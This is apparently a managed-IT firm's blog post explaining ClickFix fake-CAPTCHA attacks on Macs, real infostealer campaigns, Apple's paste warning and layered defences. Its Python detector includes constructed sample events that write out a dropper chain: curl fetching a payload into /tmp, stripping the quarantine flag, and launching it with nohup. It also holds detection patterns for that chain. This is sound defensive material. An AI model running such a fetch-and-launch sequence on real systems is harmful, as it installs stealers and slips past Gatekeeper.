
ClickFix on Mac: the attack that tricks your own staff into running malware

ClickFix tricks Mac users into pasting a malware command into Terminal themselves. Here is how it works, why it walks past notarisation and even passkeys, the macOS Tahoe 26.4 paste warning, and what UK businesses should do.


Dustin Rhodes

Stabilise

Image: Apple logo fused with a padlock on a black rounded-square app icon, representing macOS endpoint security against ClickFix attacks.

A fake CAPTCHA appears. "Verify you are human." It tells your member of staff to press Command and Space, open Terminal, and paste in a verification code. They do it. The "code" is a command, and the page copied it to their clipboard the moment they clicked. Thirty seconds later there is an infostealer running on their Mac, hoovering up saved passwords, session cookies, and anything sitting in the Keychain.

No exploit. No zero-day. No dodgy attachment that a filter should have caught. Your own employee installed it, by hand, because a website asked nicely.

This is ClickFix, and it has gone from a Windows curiosity to one of the biggest threats on the internet in about eighteen months. ESET's H1 2025 threat report clocked a 517% surge and named it the second most common attack vector behind phishing. Malwarebytes reckons it was responsible for more than half of all malware loader activity in 2025. And it is now firmly pointed at Macs.

How ClickFix works

The genius of ClickFix is that it skips the hard part of hacking. There is no software to break into. The attacker just needs the human to follow three steps.

Here is the chain on a Mac, start to finish:

  1. The victim lands on a compromised site, a malicious ad, or a convincing fake. It shows a fake CAPTCHA, a "fix this error" prompt, or a "verify to continue" box.
  2. They click the button. JavaScript silently copies a command to their clipboard. Microsoft documented this exact pattern across dozens of campaigns.
  3. The page tells them to press Command-Space, type "Terminal", and paste. They paste a command they never read, and hit return.

What runs is usually a tiny Bash script, a dropper. It pulls the real malware down from a server into the /tmp folder, strips off Apple's quarantine flag so Gatekeeper stays quiet, and launches it with nohup so it keeps running after the Terminal window closes. The payload is almost always an infostealer. Atomic macOS Stealer, also known as AMOS, is the usual suspect.

The whole thing takes one paste. And because the command came from the user's own hands, every alarm that depends on spotting a malicious download or an unsigned app stays silent.

Why it walks past your defences

This is the part that catches people out. You can have a hardened Mac fleet and still get hit, because ClickFix targets a layer none of those controls cover.

Signature antivirus is the wrong tool. It looks for known-bad files. ClickFix hands the user a command, not a file, and the user runs it deliberately. The system treats it as a legitimate action because, technically, it is. The person chose to do it.

Notarisation and Gatekeeper do not apply. Those check apps you download and double-click. They have nothing to say about a curl command you run yourself in Terminal.

Passkeys do not save you here. This is worth sitting with, because passkeys are the right move for almost everything else, and we have argued hard for them. But Sophos put it plainly in their analysis: phishing-resistant authentication is not an effective defence against ClickFix. The attack does not phish your password. It steals the session cookies and tokens you already hold, the Keychain entries, the autofill data. A passkey protects the front door. ClickFix climbs in through a window that is already open.

Microsoft's own finding makes the scale of the problem clear: thousands of devices run ClickFix commands every month with EDR active on them. The technique works because it routes around detection, not through it.

It is a Mac problem now, not a Windows one

For a while you could half-believe ClickFix was someone else's headache, a Windows Run-dialog trick. That window has closed.

Sophos tracked three separate ClickFix campaigns aimed at macOS between November 2025 and February 2026, each delivering the MacSync infostealer. The lures tell you who they are after:

  • November 2025: Google ads impersonating OpenAI's ChatGPT Atlas, hosted on legitimate-looking sites.google.com pages.
  • December 2025: shared ChatGPT conversations that redirected to a fake GitHub install screen. By 22 December that campaign had logged over 29,000 clicks across its tracked domains.
  • February 2026: a straight impersonation of Apple's own website.

Then in April 2026, Netskope Threat Labs caught a campaign targeting people in finance. Fake CAPTCHA, paste a "verification code" that was really a curl command, command-and-control set up under /tmp/xdivcmp/. The AppleScript stealer it dropped went after credentials from 14 browsers, 16 crypto wallets, more than 200 extensions, the macOS Keychain, saved passwords, card autofill, and password managers including 1Password and LastPass.

Notice the pattern in the bait: ChatGPT, GitHub, developer tooling, finance. These are not random consumers. They are exactly the kind of technical, busy, trusting people who work at the creative studios, agencies, and startups we look after. Someone comfortable in a terminal is more likely to paste a command without flinching, not less.

The macOS Tahoe defence Apple shipped quietly

Apple noticed. In macOS Tahoe 26.4, and on Sequoia, there is now a built-in warning that fires when you try to paste something dangerous-looking into Terminal. It blocks the paste and says:

Possible malware, Paste blocked. Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy.

It is a smart feature, placed at exactly the right moment, right before the mistake. Apple keeps the detection rules secret on purpose so attackers cannot test their way around them. Good.

But be clear-eyed about what it is. There is a "Paste Anyway" button. A user who has been told for two minutes that this step is normal and necessary will click it, because the whole con is built on manufactured urgency. Netskope confirmed the obvious: if someone ignores the warning, or runs an older macOS, the malware just carries on. And plenty of fleets are still behind on updates.

So Apple's warning is necessary. It is not sufficient. If your entire ClickFix defence is "we are on a recent macOS", you have a speed bump, not a wall.

What stops ClickFix

The attack is layered, so the defence has to be too. No single control catches it, which is precisely why the businesses that get burned are the ones relying on a single control.

Keep every Mac on 26.4 or later. This is the cheapest win available. The Terminal paste warning only exists on current macOS, so an unmanaged fleet drifting on old versions has none of it. Enforced update policies through MDM make this automatic instead of hopeful. We covered the management side in our Mac security baselines guide.
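As an added example (not code from the original post or from Stabilise), here is the kind of compliance check an MDM admin would run over an inventory export to find the Macs that have not reached 26.4 and therefore have no paste warning. It assumes the export gives a hostname and the string from sw_vers -productVersion; the inventory rows below are constructed samples. The point it makes beyond the paragraph is that version strings must be compared numerically, component by component, or a hypothetical "26.10" sorts below "26.4" and slips through.

```python
"""Report Macs below the macOS version that carries the Terminal paste warning.

Added example, not the original post's code. Assumes an MDM export of
(hostname, productVersion) pairs; SAMPLE_INVENTORY is constructed data.
"""

# The post's baseline: macOS Tahoe 26.4 or later.
REQUIRED_VERSION = "26.4"


def parse_version(text):
    """Turn '26.4' into (26, 4, 0): pad to three components so 26.4 == 26.4.0
    and compare as integers, never as strings."""
    parts = [int(piece) for piece in text.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def meets_baseline(version, required=REQUIRED_VERSION):
    """True when this Mac is on the baseline release or anything newer."""
    return parse_version(version) >= parse_version(required)


def out_of_date(inventory, required=REQUIRED_VERSION):
    """Return (hostname, version) for every Mac below the baseline, oldest first,
    so the report leads with the machines that need attention most."""
    stale = [(host, ver) for host, ver in inventory if not meets_baseline(ver, required)]
    return sorted(stale, key=lambda row: parse_version(row[1]))


# Constructed sample export; hostnames and versions are made up for the demo.
SAMPLE_INVENTORY = [
    ("studio-mbp-01", "26.4"),
    ("studio-mbp-02", "26.4.1"),
    ("studio-imac-03", "26.3.1"),
    ("finance-mba-04", "15.7"),
    ("design-mbp-05", "26.10"),   # hypothetical; a string compare would rank this below 26.4
]

if __name__ == "__main__":
    for host, ver in out_of_date(SAMPLE_INVENTORY):
        print(f"{host}: macOS {ver} is below {REQUIRED_VERSION}, no Terminal paste warning")
```

Feed it the real export from your MDM and the two stale hosts above become a ticket list; wire the same check into a scheduled report and the "we are on a recent macOS" claim gets verified rather than assumed.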

Run behavioural EDR, not just antivirus. This is the layer that sees what happens after the paste: a Bash process spawning from Terminal, fetching a binary into /tmp, stripping the quarantine flag, launching with nohup. Signatures miss it. Behavioural detection is built for exactly this sequence. It is the main reason we walked through the EDR options for Mac in detail, because this threat is what they earn their keep against.
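To make the "post-paste pattern" concrete, here is an added example (not code from the original post, Stabilise, or any EDR vendor) of detection logic run over process-start telemetry. It covers both the dropper chain described under "How ClickFix works" and the sequence this paragraph says behavioural EDR should catch: a shell under Terminal spawning a fetch into /tmp, an xattr call that strips the quarantine flag, and a nohup launch from /tmp. The record shape (ts, pid, ppid, parent, exe, argv) is an assumption about what an EDR exports, and every event below is constructed, including a benign developer session and a launchd job that each touch only one of the three steps and therefore do not alert.

```python
"""Flag the ClickFix post-paste dropper sequence in process-start telemetry.

Added example, not the original post's code. Assumes an EDR exports one record
per process start with ts (seconds), pid, ppid, parent (parent's name), exe and
argv. SAMPLE_EVENTS is constructed data; the URL is a placeholder.
"""
import os
from collections import defaultdict

WINDOW_SECONDS = 120   # the real chain finishes in seconds; a wide window costs little
TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/")
MIN_INDICATORS = 2     # two of the three steps under one shell is worth a look
SHELLS = ("bash", "sh", "zsh")


def _touches_tmp(argv):
    return any(token.startswith(TMP_PREFIXES) for token in argv)


def classify(event):
    """Return which dropper step this process matches, or None."""
    name = os.path.basename(event["exe"])
    argv = event["argv"]
    if name in ("curl", "wget") and _touches_tmp(argv):
        return "fetch_to_tmp"                      # payload pulled into /tmp
    if name == "xattr" and _touches_tmp(argv) and (
        "-c" in argv or ("-d" in argv and "com.apple.quarantine" in argv)
    ):
        return "quarantine_strip"                  # Gatekeeper's flag removed
    if name == "nohup" and len(argv) > 1 and argv[1].startswith(TMP_PREFIXES):
        return "tmp_exec"                          # launched to outlive the window
    if event["exe"].startswith(TMP_PREFIXES):
        return "tmp_exec"                          # or executed straight from /tmp
    return None


def detect_clickfix_chain(events):
    """Group matched steps by the parent shell; alert when at least
    MIN_INDICATORS distinct steps occur under one shell within WINDOW_SECONDS
    of the first. Also records whether that shell was opened from Terminal."""
    shell_parent = {}                  # shell pid -> name of its parent process
    steps = defaultdict(list)          # shell pid -> [(ts, step)]
    for ev in sorted(events, key=lambda e: e["ts"]):
        if os.path.basename(ev["exe"]) in SHELLS:
            shell_parent[ev["pid"]] = ev["parent"]
        step = classify(ev)
        if step:
            steps[ev["ppid"]].append((ev["ts"], step))

    findings = []
    for shell_pid, seen in steps.items():
        first_ts = seen[0][0]
        in_window = {step for ts, step in seen if ts - first_ts <= WINDOW_SECONDS}
        if len(in_window) >= MIN_INDICATORS:
            findings.append({
                "shell_pid": shell_pid,
                "from_terminal": shell_parent.get(shell_pid) == "Terminal",
                "indicators": sorted(in_window),
            })
    return findings


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # Session A: shell from Terminal, then all three dropper steps.
    {"ts": 100, "pid": 501, "ppid": 400, "parent": "Terminal", "exe": "/bin/bash",
     "argv": ["bash", "-c", "<pasted command, elided>"]},
    {"ts": 101, "pid": 502, "ppid": 501, "parent": "bash", "exe": "/usr/bin/curl",
     "argv": ["curl", "-fsSL", "http://placeholder.invalid/p", "-o", "/tmp/.u"]},
    {"ts": 102, "pid": 503, "ppid": 501, "parent": "bash", "exe": "/usr/bin/xattr",
     "argv": ["xattr", "-d", "com.apple.quarantine", "/tmp/.u"]},
    {"ts": 103, "pid": 504, "ppid": 501, "parent": "bash", "exe": "/usr/bin/nohup",
     "argv": ["nohup", "/tmp/.u"]},
    # Session B: a developer fetching a tool into Downloads and clearing its
    # quarantine flag by hand. Nothing touches /tmp, so no step matches.
    {"ts": 200, "pid": 601, "ppid": 400, "parent": "Terminal", "exe": "/bin/zsh",
     "argv": ["zsh"]},
    {"ts": 205, "pid": 602, "ppid": 601, "parent": "zsh", "exe": "/usr/bin/curl",
     "argv": ["curl", "-L", "https://placeholder.invalid/tool.tgz", "-o", "/Users/dev/Downloads/tool.tgz"]},
    {"ts": 230, "pid": 603, "ppid": 601, "parent": "zsh", "exe": "/usr/bin/xattr",
     "argv": ["xattr", "-d", "com.apple.quarantine", "/Users/dev/Downloads/tool"]},
    # Session C: a launchd job running a helper out of /tmp. One step only.
    {"ts": 300, "pid": 701, "ppid": 1, "parent": "launchd", "exe": "/bin/sh",
     "argv": ["sh", "/Library/Scripts/cleanup.sh"]},
    {"ts": 301, "pid": 702, "ppid": 701, "parent": "sh", "exe": "/usr/bin/nohup",
     "argv": ["nohup", "/tmp/cleanup-helper"]},
]

if __name__ == "__main__":
    for finding in detect_clickfix_chain(SAMPLE_EVENTS):
        print(finding)
```

Only session A fires, with all three indicators and from_terminal set, which is the signal to treat the session cookies and Keychain on that Mac as already exposed. Sessions B and C each match a single step and stay quiet; that is the trade the threshold buys, fewer tickets for developers who legitimately clear quarantine flags, at the cost of needing two steps before an alert. If your telemetry does not expose parent names, drop the from_terminal field rather than guess it.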

Filter the network. The dropper has to phone home to download the real payload and set up command-and-control. DNS filtering and outbound traffic controls can cut that call before anything lands. Kill the connection and the half-finished attack dies in /tmp.

Restrict who can run Terminal at all. Most staff at a creative agency or a finance team never touch Terminal. On a managed fleet you can limit it to the people who genuinely need it. If Terminal is not there to paste into, the attack has nowhere to go.

Tell people the one rule. Every other control is technical. This one is a sentence, and it defeats the entire technique: never paste a command into Terminal because a website told you to. No legitimate CAPTCHA, no real error fix, no genuine verification will ever ask you to do that. Say it once, clearly, and you have inoculated most of your team for free.

None of these is hard. The problem is that almost nobody has all five, and ClickFix is built to slip through whichever one you are missing.

How we handle this for clients

We deploy this as a stack, not a checklist someone gets round to. Enforced macOS updates so the paste warning is always live. Behavioural EDR watching for the post-paste pattern. DNS and outbound filtering to break command-and-control. Terminal locked down to the people who need it. And the staff message delivered as part of onboarding, not buried in a policy PDF nobody opens.

We are honest that no setup is bulletproof against an attack that targets human judgement. A determined, well-built lure aimed at a tired person will sometimes work. The goal is not perfection. It is to make sure that when one paste slips through, the next four layers catch it before any data leaves the building.

If you are not sure how exposed your Macs are to this, that is the conversation to have. Book a free audit and we will look at your update posture, your endpoint security, and your network controls, then tell you where the gaps are, even the ones we are not the right people to fix.

Frequently asked questions

What is a ClickFix attack? ClickFix is a social engineering technique that tricks a user into running a malicious command on their own device. A fake CAPTCHA, error message, or verification page tells the victim to open Terminal on a Mac, or the Run dialog on Windows, and paste in a command the page has usually copied to their clipboard automatically. Running it downloads and installs malware, most often an infostealer. ESET's H1 2025 report recorded a 517% surge and ranked it second only to phishing. It exploits the person, not the software.

Does macOS protect against ClickFix? Partly, and only on recent versions. macOS Tahoe 26.4 and Sequoia added a warning that blocks a dangerous-looking paste into Terminal with the message "Possible malware, Paste blocked." It is a real improvement, but it can be dismissed with a "Paste Anyway" button and does nothing on older macOS. Treat it as one layer, not the whole defence.

Does ClickFix work on Mac or just Windows? Both. It started on Windows and moved to Mac fast. Sophos documented three macOS campaigns between November 2025 and February 2026 using fake ChatGPT, GitHub, and Apple lures to deliver the MacSync infostealer. In April 2026 Netskope found a campaign targeting finance-sector users with an AppleScript stealer that harvested credentials from 14 browsers, 16 crypto wallets, the Keychain, and password managers including 1Password and LastPass.

Do passkeys or antivirus stop ClickFix? Not on their own. Signature antivirus struggles because the user runs the command manually, so it looks legitimate. Notarisation does not apply to a command typed into Terminal. And Sophos is blunt that phishing-resistant authentication like passkeys is not an effective defence, because ClickFix steals session cookies and data rather than passwords. What helps is behavioural EDR, network filtering, staff awareness, and staying on macOS 26.4 or later.

What should a UK business do about ClickFix? Keep every Mac on macOS Tahoe 26.4 or later so the paste warning is active. Run behavioural EDR that watches for the post-paste behaviour. Filter DNS and outbound traffic so the dropper cannot reach its command-and-control server. Tell staff never to paste a command into Terminal because a web page told them to. And on a managed fleet, restrict who can run Terminal at all. We deploy this layered setup as standard.